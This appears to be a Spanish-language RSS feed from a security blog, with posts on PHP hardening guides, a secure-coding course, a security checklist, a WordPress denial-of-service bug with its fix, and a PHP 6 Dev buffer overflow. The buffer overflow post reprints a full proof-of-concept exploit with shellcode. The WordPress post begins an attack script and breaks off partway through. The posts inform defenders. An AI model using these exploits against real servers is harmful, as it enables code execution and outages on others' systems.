<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>La Comunidad DragonJAR &#187; PHP</title> <atom:link href="http://www.dragonjar.org/tag/php/feed" rel="self" type="application/rss+xml" /><link>http://www.dragonjar.org</link> <description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description> <lastBuildDate>Sat, 11 Feb 2012 01:08:12 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>Como asegurar sitios en PHP</title><link>http://www.dragonjar.org/como-asegurar-sitios-en-php.xhtml</link> <comments>http://www.dragonjar.org/como-asegurar-sitios-en-php.xhtml#comments</comments> <pubDate>Fri, 03 Sep 2010 21:36:57 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[captcha con php]]></category> <category><![CDATA[codigos php para web]]></category> <category><![CDATA[cookies php]]></category> <category><![CDATA[html pdf php]]></category> <category><![CDATA[login en php]]></category> <category><![CDATA[login php]]></category> <category><![CDATA[manual php]]></category> <category><![CDATA[or php]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[php seguridad]]></category> <category><![CDATA[seguridad con php]]></category> <category><![CDATA[seguridad de php]]></category> <category><![CDATA[seguridad en php]]></category> <category><![CDATA[seguridad php]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4894</guid> <description><![CDATA[Gracias a Cristian Borghello me entero que en Devshed.com han publicado una guías paso a paso para asegurar sitios con PHP, las cuales complementan la lista Lista de tareas para revisar la seguridad en proyectos PHP que publicamos en la comunidad hace poco. Secure PHP Programing y Securing Your PHP Website son un resumen del [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2010/09/PHPsec.jpg" width="240" title="Como asegurar sitios en PHP" alt="PHPsec Como asegurar sitios en PHP" /></p><p>Gracias a Cristian Borghello me entero que en <a
href="http://www.Devshed.com">Devshed.com</a> han publicado una guías paso a paso para asegurar <a
href="http://www.dragonjar.org/tag/sitios" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Sitios">sitios</a> con <a
href="http://www.dragonjar.org/tag/php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PHP">PHP</a>, las cuales <a
href="http://www.dragonjar.org/lista-de-tareas-seguridad-en-php.xhtml">complementan la lista Lista de tareas para revisar la seguridad en proyectos PHP</a> que publicamos en la comunidad hace poco.</p><p
style="text-align: center;"><img
class="alignnone" title="Seguridad en PHP" src="http://www.dragonjar.org/wp-content/uploads/2010/09/PHPsec.jpg" alt="PHPsec Como asegurar sitios en PHP" width="500" height="375" /></p><p><a
href="http://www.devshed.com/c/a/PHP/Secure-PHP-Programming/">Secure PHP Programing</a> y <a
href="http://www.devshed.com/c/a/PHP/Securing-Your-PHP-Website/">Securing Your PHP Website</a> son un resumen del libro Beginning PHP and Oracle, escrito por W. Jason Gilmore y Bob Bryla y en el que tratan de sobre temas como, la configuración segura de PHP, como asegurar nuestra aplicación en PHP, como validar los datos adecuadamente, entre otras cosas.<span
id="more-4894"></span></p><p>Si eres desarrollador <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">web</a> y manejas PHP, te recomiendo que leas estas 2 guias para que mejores la <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> de tus <a
href="http://www.dragonjar.org/tag/aplicaciones" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con aplicaciones">aplicaciones</a> web.</p><ul><li><a
href="http://www.devshed.com/c/a/PHP/Secure-PHP-Programming/">Secure PHP Programing</a></li><li><a
href="http://www.devshed.com/c/a/PHP/Securing-Your-PHP-Website/">Securing Your PHP Website</a></li></ul><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/buffer-overflow-en-php-6-dev.xhtml" title="Buffer Overflow en PHP 6 Dev">Buffer Overflow en PHP 6 Dev</a></li><li><a
href="http://www.dragonjar.org/lista-de-tareas-seguridad-en-php.xhtml" title="Lista de tareas para revisar la seguridad en proyectos PHP">Lista de tareas para revisar la seguridad en proyectos PHP</a></li><li><a
href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-web-con-php-y-ajax.xhtml" title="Clase Virtual Gratuita sobre Desarrollo Web con PHP y Ajax">Clase Virtual Gratuita sobre Desarrollo Web con PHP y Ajax</a></li><li><a
href="http://www.dragonjar.org/memorias-del-black-hat-usa-2009.xhtml" title="Memorias del Black Hat USA 2009">Memorias del Black Hat USA 2009</a></li><li><a
href="http://www.dragonjar.org/charla-de-seguridad-web-gratuita-barcelona-espana.xhtml" title="Charla de Seguridad Web Gratuita &#8211; Barcelona España ">Charla de Seguridad Web Gratuita &#8211; Barcelona España </a></li><li><a
href="http://www.dragonjar.org/cursos-gratis-de-diseno-web-en-el-sena-virtual.xhtml" title="Cursos Gratis de Diseño Web en el Sena Virtual">Cursos Gratis de Diseño Web en el Sena Virtual</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/como-asegurar-sitios-en-php.xhtml/feed</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>Curso sobre desarrollo seguro de aplicaciones web por Google</title><link>http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml</link> <comments>http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml#comments</comments> <pubDate>Thu, 06 May 2010 15:43:34 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Curso]]></category> <category><![CDATA[Diseño]]></category> <category><![CDATA[Google]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[Programación]]></category> <category><![CDATA[Programador]]></category> <category><![CDATA[Programadores]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[Sitios]]></category> <category><![CDATA[Vulnerabilidad]]></category> <category><![CDATA[Vulnerabilidades]]></category> <category><![CDATA[Web]]></category> <category><![CDATA[XSS]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4279</guid> <description><![CDATA[Google acaba de lanzar un nuevo curso en línea para el diseño y desarrollo de aplicaciones Web, con este, que los programadores aprenderán a evitar los errores comunes de seguridad que se presentan en las aplicaciones web y que pueden llevar a la creación de vulnerabilidades en sus sitios. El curso, que es parte del [...]]]></description> <content:encoded><![CDATA[<p>Google acaba de lanzar un nuevo curso en línea para el diseño y desarrollo de <a
href="http://www.dragonjar.org/tag/aplicaciones" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con aplicaciones">aplicaciones</a> Web, con este, que los programadores aprenderán a evitar los errores comunes de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> que se presentan en las aplicaciones web y que pueden llevar a la creación de vulnerabilidades en sus <a
href="http://www.dragonjar.org/tag/sitios" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Sitios">sitios</a>.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://img265.imageshack.us/img265/7680/jarlsbergimgassistcusto.png" border="0" alt="jarlsbergimgassistcusto Curso sobre desarrollo seguro de aplicaciones web por Google"  title="Curso sobre desarrollo seguro de aplicaciones web por Google" /></p><p>El curso, que es parte del proyecto <a
href="http://anonym-url.com/go.php?to=http://code.google.com/edu/" target="_blank">Google Code University</a>, se basa en el concepto de aplicaciones de tipo Twitter, denominada <a
href="http://jarlsberg.appspot.com/start" target="_blank">Jarlsberg</a>, un programa que Google liberó para este fin. Conocido como &#8220;<a
href="http://jarlsberg.appspot.com/part1" target="_blank">Web Application Exploits and Defenses</a>,&#8221; desde el cual se da la oportunidad de visualizar el funcionamiento interno de una aplicación insegura, analizar las vulnerabilidades y aprender de los errores de <a
href="http://www.dragonjar.org/tag/programacion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Programación">programación</a> que generaron estas fallas.<span
id="more-4279"></span></p><p>Ademas de aprender desarrollo, también tendremos una serie de retos que requieren que los estudiantes se esfuercen e identifiquen vulnerabilidades especificas en el código de Jarlsberg. Después de que los estudiantes aprenden los fundamentos de una <a
href="http://www.dragonjar.org/tag/vulnerabilidad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerabilidad">vulnerabilidad</a>, como CSRF, <a
href="http://www.dragonjar.org/tag/xss" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con XSS">XSS</a>, se les pide que encuentren una forma de utilizar esta falla para realizar una acción maliciosas especifica en la aplicación, como cambiar algunos detalles en la cuenta de registro de los usuarios sin que ellos se enteren.</p><h2 style="text-align: center;"><a
href="http://code.google.com/intl/es-ES/edu/">Ingresa al Curso de Google sobre Seguridad Web</a></h2><p><strong>Más Información:</strong><br
/> <a
href="http://comunidad.dragonjar.org/f150/google-ofrece-curso-gratuito-para-diseno-seguro-de-aplicaciones-web-9852/#post26053">Anuncio de Hans en la Comunidad</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml" title="Presentación de conceptos básicos en Seguridad Web">Presentación de conceptos básicos en Seguridad Web</a></li><li><a
href="http://www.dragonjar.org/revisa-la-seguridad-de-tu-sitio-web-gratis.xhtml" title="Revisa la seguridad de tu sitio web Gratis">Revisa la seguridad de tu sitio web Gratis</a></li><li><a
href="http://www.dragonjar.org/x5s-encuentra-fallos-xss-lfi-y-rfi-facilmente.xhtml" title="X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente">X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente</a></li><li><a
href="http://www.dragonjar.org/top-10-fallos-de-seguridad-en-aplicaciones-web.xhtml" title="TOP 10 Fallos de Seguridad en Aplicaciones Web">TOP 10 Fallos de Seguridad en Aplicaciones Web</a></li><li><a
href="http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml" title="Multiples Vulnerabilidades en SMF">Multiples Vulnerabilidades en SMF</a></li><li><a
href="http://www.dragonjar.org/charla-de-seguridad-web-gratuita-barcelona-espana.xhtml" title="Charla de Seguridad Web Gratuita &#8211; Barcelona España ">Charla de Seguridad Web Gratuita &#8211; Barcelona España </a></li><li><a
href="http://www.dragonjar.org/descargar-gratis-internet-explorer-8-final.xhtml" title="Descargar Gratis Internet Explorer 8 Final">Descargar Gratis Internet Explorer 8 Final</a></li><li><a
href="http://www.dragonjar.org/cursos-gratis-de-diseno-web-en-el-sena-virtual.xhtml" title="Cursos Gratis de Diseño Web en el Sena Virtual">Cursos Gratis de Diseño Web en el Sena Virtual</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml/feed</wfw:commentRss> <slash:comments>5</slash:comments> </item> <item><title>Buffer Overflow en PHP 6 Dev</title><link>http://www.dragonjar.org/buffer-overflow-en-php-6-dev.xhtml</link> <comments>http://www.dragonjar.org/buffer-overflow-en-php-6-dev.xhtml#comments</comments> <pubDate>Mon, 03 May 2010 07:48:30 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[0day]]></category> <category><![CDATA[Bug]]></category> <category><![CDATA[Codigo]]></category> <category><![CDATA[Exploit]]></category> <category><![CDATA[PHP]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4248</guid> <description><![CDATA[Recientemente fue descubierto un fallo grave de seguridad en la versión de desarrollo de PHP 6, el lenguaje de programación mas utilizado para realizar aplicaciones web. El problema se encuentra en la funcion str_transliterate() que permite &#8220;traducir&#8221; un texto de un lenguaje a otro, pero a su vez no valida adecuadamente los parámetros de entrada [...]]]></description> <content:encoded><![CDATA[<p>Recientemente fue descubierto un fallo grave de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> en la versión de <a
href="http://www.dragonjar.org/tag/desarrollo" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Desarrollo">desarrollo</a> de <a
href="http://www.dragonjar.org/tag/php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PHP">PHP</a> 6, el lenguaje de <a
href="http://www.dragonjar.org/tag/programacion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Programación">programación</a> mas utilizado para realizar aplicaciones web.</p><p
style="text-align: center;"><img
class="alignnone" src="http://i.imgur.com/p7dDW.jpg" alt="p7dDW Buffer Overflow en PHP 6 Dev" width="500" height="273" title="Buffer Overflow en PHP 6 Dev" /></p><p>El problema se encuentra en la funcion str_transliterate() que permite &#8220;traducir&#8221; un texto de un lenguaje a otro, pero a su vez no valida adecuadamente los parámetros de entrada y permite la ejecución de código por medio de un buffer overflow.<span
id="more-4248"></span></p><p>Les dejo una <a
href="http://www.exploit-db.com/exploits/12051">PoC que explota esta vulnerabilidad </a>sobre servidor Apache, corriendo en <a
href="http://www.dragonjar.org/tag/windows-xp" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Windows XP">Windows XP</a> SP3 y permite ejecutar la calculadora del sistema:</p><blockquote><p><code># Title: PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit<br
/> # EDB-ID: 12051<br
/> # CVE-ID: ()<br
/> # OSVDB-ID: ()<br
/> # Author: Pr0T3cT10n<br
/> # Published: 2010-04-04<br
/> # Verified: yes<br
/> # Download Exploit Code<br
/> # Download Vulnerable app</code></p><p><code>&lt;?php<br
/> error_reporting(0);<br
/> #####################################################################<br
/> ## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit<br
/> ## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev<br
/> ## Buffer Overflow<br
/> ## <a
href="http://www.dragonjar.org/tag/bug" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Bug">Bug</a> discovered by Pr0T3cT10n, &lt;pr0t3ct10n@gmail.com&gt;<br
/> ## Exploited by TheLeader, Debug<br
/> ## SP. Thanks: HDM<br
/> ## <a
href="http://www.dragonjar.org/tag/http" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con HTTP">http</a>://www.nullbyte.org.il<br
/> #####################################################################<br
/> ## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC<br
/> ## Take a look, 'unicode.semantics' has to be on!<br
/> ## php.ini &gt; unicode.semantics = on<br
/> #####################################################################<br
/> if(ini_get_bool('unicode.semantics')) {<br
/> $buff = str_repeat("\u4141", 256);<br
/> $eip = "\u1445\u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll<br
/> $nops = str_repeat("\u9090", 20);</code></p><p><code># WinExec Calc XP SP3 HEB Unicode-encoded shellcode<br
/> $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u250D\u7C86\uD3FF\u6163\u636C\u414E";</code></p><p><code># WinExec Calc XP SP3 EN Unicode-encoded shellcode (added by muts)<br
/> # $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u23AD\u7C86\uD3FF\u6163\u636C\u414E";</code></p><p><code>$exploit = $buff.$eip.$nops.$shellcode;<br
/> str_transliterate(0, $exploit, 0);<br
/> } else {<br
/> exit("Error! 'unicode.semantics' has be on!\r\n");<br
/> }</code></p><p><code>function ini_get_bool($a) {<br
/> $b = ini_get($a);<br
/> switch (strtolower($b)) {<br
/> case 'on':<br
/> case 'yes':<br
/> case 'true':<br
/> return 'assert.active' !== $a;<br
/> case 'stdout':<br
/> case 'stderr':<br
/> return 'display_errors' === $a;<br
/> default:<br
/> return (bool) (int) $b;<br
/> }<br
/> }<br
/> ?&gt;</code></p></blockquote><p>Hay que recordar que esta versión de PHP aun esta en desarrollo, pero no deja de ser inquietante este tipo de problemas de carácter critico, en un lenguaje de programación tan extendido en la red, como lo es PHP.</p><p><strong>Mas Información:</strong><br
/> <a
title="Permanent Link: PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit" rel="bookmark" href="http://www.offensive-security.com/backtrack/php-6-0-dev-str_transliterate-0day-buffer-overflow-exploit/">PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit</a><br
/> <a
onclick="javascript:pageTracker._trackPageview('/outbound/article/www.exploit-db.com');" href="http://www.exploit-db.com/exploits/12051">Codigo en exploit-db.com</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a
href="http://www.dragonjar.org/0day-en-google-chrome.xhtml" title="0day en Google Chrome">0day en Google Chrome</a></li><li><a
href="http://www.dragonjar.org/memorias-del-black-hat-usa-2010.xhtml" title="Memorias del Black Hat USA 2010">Memorias del Black Hat USA 2010</a></li><li><a
href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-en-timthumb-php-afecta-millones-de-blogs-con-wordpress.xhtml" title="Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress">Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress</a></li><li><a
href="http://www.dragonjar.org/como-descubrir-vulnerabilidades-y-escribir-exploits.xhtml" title="Cómo descubrir vulnerabilidades y escribir exploits">Cómo descubrir vulnerabilidades y escribir exploits</a></li><li><a
href="http://www.dragonjar.org/exploit-0day-para-internet-explorer-en-windows-7.xhtml" title="Exploit 0day para Internet Explorer en Windows 7">Exploit 0day para Internet Explorer en Windows 7</a></li><li><a
href="http://www.dragonjar.org/multiples-distribuciones-de-seguridad-en-tu-usb-con-katana.xhtml" title="Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB">Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/buffer-overflow-en-php-6-dev.xhtml/feed</wfw:commentRss> <slash:comments>6</slash:comments> </item> <item><title>Lista de tareas para revisar la seguridad en proyectos PHP</title><link>http://www.dragonjar.org/lista-de-tareas-seguridad-en-php.xhtml</link> <comments>http://www.dragonjar.org/lista-de-tareas-seguridad-en-php.xhtml#comments</comments> <pubDate>Sun, 11 Apr 2010 21:48:29 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Aplicacion]]></category> <category><![CDATA[aplicaciones]]></category> <category><![CDATA[Guia]]></category> <category><![CDATA[Lista]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[Seguro]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4156</guid> <description><![CDATA[La siguiente es una lista de tareas o &#8220;cosas a revisar&#8221; para garantizar que nuestro proyecto web en php, cumpla con todos los requisitos necesarios para que sea seguro, fue creada por sk89q para ayudar a los desarrolladores web a desarrollar de forma segura sus aplicaciones. Esta pequeña pero útil guía, es la versión imprimible [...]]]></description> <content:encoded><![CDATA[<p>La siguiente es una <a
href="http://www.dragonjar.org/tag/lista" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Lista">lista</a> de tareas o &#8220;cosas a revisar&#8221; para garantizar que nuestro proyecto <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">web</a> en <a
href="http://www.dragonjar.org/tag/php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PHP">php</a>, cumpla con todos los requisitos necesarios para que sea <a
href="http://www.dragonjar.org/tag/seguro" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguro">seguro</a>, fue creada por <a
href="http://www.sk89q.com/2010/04/printable-php-security-checklist/">sk89q</a> para ayudar a los desarrolladores web a desarrollar de forma segura sus <a
href="http://www.dragonjar.org/tag/aplicaciones" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con aplicaciones">aplicaciones</a>.</p><p
style="text-align: center;"><img
class="alignnone" title="Seguridad en PHP" src="http://img580.imageshack.us/img580/9791/phpsecscreenshot.png" alt="phpsecscreenshot Lista de tareas para revisar la seguridad en proyectos PHP" width="304" height="392" /></p><p>Esta pequeña pero útil guía, es la versión imprimible del articulo completo titulado <a
href="http://www.sk89q.com/2009/08/definitive-php-security-checklist/">Definitive PHP security checklist</a> donde paso a paso nos dan a conocer los puntos que todo desarrollador web debe tener en cuenta para garantizar la <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> de sus proyectos.<span
id="more-4156"></span></p><p>Esta pequeña lista de tareas, puede servirte de complemento si cuentas con el poster que <a
href="https://www.sektioneins.de/en/company/index.html"><strong>SektionEins</strong></a> envia de forma gratuita a desarrolladores de toda Europa, una excelente <a
href="http://www.dragonjar.org/tag/guia" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Guia">guia</a> de referencia donde se listan las opciones de seguridad del lenguaje PHP.</p><p
style="text-align: center;"><img
class="aligncenter" title="PHP Security Poster" src="http://farm3.static.flickr.com/2773/4519009184_3dc1723524_o.png" alt="4519009184 3dc1723524 o Lista de tareas para revisar la seguridad en proyectos PHP" width="499" height="354" /></p><p>Si aun no tienes este excelente afiche, puedes solicitarlo gratuitamente en inglés o aleman <a
href="https://www.sektioneins.de/de/kontakt/php-security-poster/index.html">llenando este formulario</a>, si deseas tenerlo y no estás en la Unión Europea, todavía<a
href="http://www.sektioneins.de/downloads/SektionEins_WebSecurityPoster_englisch.pdf"> puedes descargarlo en formato PDF haciendo click en este enlace</a>.</p><p><strong>Más Información:</strong><br
/> <a
href="http://www.sk89q.com/2010/04/printable-php-security-checklist/">Pagina Oficial del PHP Security Checklist </a><br
/> <a
href="http://www.suspekt.org/2009/11/28/sektioneins-php-security-poster/">Pagina Oficial del Poster &#8220;PHP Web Security&#8221;</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml" title="Como realizar un borrado seguro usando BleachBit">Como realizar un borrado seguro usando BleachBit</a></li><li><a
href="http://www.dragonjar.org/guia-oficial-de-seguridad-en-facebook.xhtml" title="Guía oficial de seguridad en Facebook ">Guía oficial de seguridad en Facebook </a></li><li><a
href="http://www.dragonjar.org/consejos-simples-de-seguridad-para-ir-a-la-campus-party.xhtml" title="Consejos Simples de Seguridad para ir a la Campus Party">Consejos Simples de Seguridad para ir a la Campus Party</a></li><li><a
href="http://www.dragonjar.org/x5s-encuentra-fallos-xss-lfi-y-rfi-facilmente.xhtml" title="X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente">X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente</a></li><li><a
href="http://www.dragonjar.org/video-tutoriales-de-wireshark.xhtml" title="Video Tutoriales de Wireshark">Video Tutoriales de Wireshark</a></li><li><a
href="http://www.dragonjar.org/respuesta-juridica-frente-ataques-informaticos.xhtml" title="Respuesta jurídica frente ataques informáticos">Respuesta jurídica frente ataques informáticos</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/top-10-fallos-de-seguridad-en-aplicaciones-web.xhtml" title="TOP 10 Fallos de Seguridad en Aplicaciones Web">TOP 10 Fallos de Seguridad en Aplicaciones Web</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/lista-de-tareas-seguridad-en-php.xhtml/feed</wfw:commentRss> <slash:comments>10</slash:comments> </item> <item><title>Denegacion de Servicio en WordPress</title><link>http://www.dragonjar.org/dos-en-wordpress.xhtml</link> <comments>http://www.dragonjar.org/dos-en-wordpress.xhtml#comments</comments> <pubDate>Sun, 18 Oct 2009 21:26:41 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Bug]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[Vulnerable]]></category> <category><![CDATA[WordPress]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3246</guid> <description><![CDATA[Jose Carlos Norte acaba de publicar en su blog, un nuevo fallo de seguridad descubierto en el popular wordpress, este fallo permite a a cualquier persona de forma sencilla dejar fuera de linea un blog con WordPress causando una denegacion de servicio. El bug se encuentra en el archivo wp-trackback.php quien no valida adecuadamente la [...]]]></description> <content:encoded><![CDATA[<p><a
href="http://rooibo.wordpress.com/2009/10/17/agujero-de-seguridad-en-wordpress/">Jose Carlos Norte</a> acaba de publicar en su blog, un nuevo fallo de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> descubierto en el popular <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">wordpress</a>, este fallo permite a a cualquier persona de forma sencilla dejar fuera de linea un blog con <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">WordPress</a> causando una denegacion de <a
href="http://www.dragonjar.org/tag/servicio" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Servicio">servicio</a>.</p><p
style="text-align: center;"><img
class="alignnone" title="Denegacion de Servicio WordPress" src="http://farm3.static.flickr.com/2715/4027319134_4ef81cac76_o.jpg" alt="4027319134 4ef81cac76 o Denegacion de Servicio en WordPress" width="256" height="222" /></p><p>El <a
href="http://www.dragonjar.org/tag/bug" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Bug">bug</a> se encuentra en el archivo <strong>wp-trackback.<a
href="http://www.dragonjar.org/tag/php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PHP">php</a></strong> quien no valida adecuadamente la variable <strong>$charset</strong>, permitiendo ingresar una peticion POST especialmente diseñada con una cantidad indeterminada de parámetros, causando un  gran consumo de memoria y CPU hasta que estos se agoten y el servidor deja de responder.<span
id="more-3246"></span></p><p>Todas las versiones de WordPress hasta el momento son vulnerables a este fallo (y según Jose Carlos, el parche que publicaría WordPress <a
href="http://rooibo.wordpress.com/2009/10/17/agujero-de-seguridad-en-wordpress/">tampoco lo soluciona</a>), aunque dependiendo de la configuración individual de cada servidor, el problema es mayor o menor, por ejemplo un servido con <strong>mod_security</strong>, no seria <a
href="http://www.dragonjar.org/tag/vulnerable" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerable">vulnerable</a> ya que  bloquearía estas peticiones mal intencionadas,  también se pueden mitigar los daños con una adecuada configuración del parámetro <strong>php_memory_limit</strong> del <strong>php.ini</strong> para evitar que tus desarrollos <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">web</a> utilicen mas memoria de la que en realidad necesitan, podrías también utilizar el WP-IDS un mod para WordPress del PHPIDS (reseñado el la guía blanca de seguridad en wordpress <a
title="Enlace permanente a WordPress Security Whitepaper" rel="bookmark" href="../wordpress-security-whitepaper.xhtml">WordPress Security Whitepaper</a>) el cual bloquearía no solo estas peticiones sino muchos mas problemas de seguridad.</p><p>Les dejo la solución propuesta por Jose Carlos en su blog para este problema:</p><blockquote><p><code>Reemplazar en la linea 45 del archivo wp-trackback.php esto<br
/> <strong>$charset = $_POST['charset'];</strong></code></p><p>por esto<br
/> <strong>$charset =</strong> str_replace(”,”,”&#8221;,<strong>$_POST['charset']</strong>)<strong>;<br
/> </strong>if(is_array($charset)) { exit; }</p></blockquote><p>Y el <a
href="http://www.dragonjar.org/tag/exploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Exploit">exploit</a> para verificar que somos vulnerables:</p><blockquote><p><code>&lt;?php<br
/> //wordpress Resource exhaustion Exploit<br
/> //<a
href="http://www.dragonjar.org/tag/http" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con HTTP">http</a>://rooibo.wordpress.com/<br
/> //security@wordpress.org contacted and get a response,<br
/> //but no solution available.<br
/> if(count($argv) &lt; 2) {<br
/> echo “You need to specify a url to attack\n”;<br
/> exit;<br
/> }</code></p><p>$url = $argv[1];</p><p>$data = parse_url($url);<br
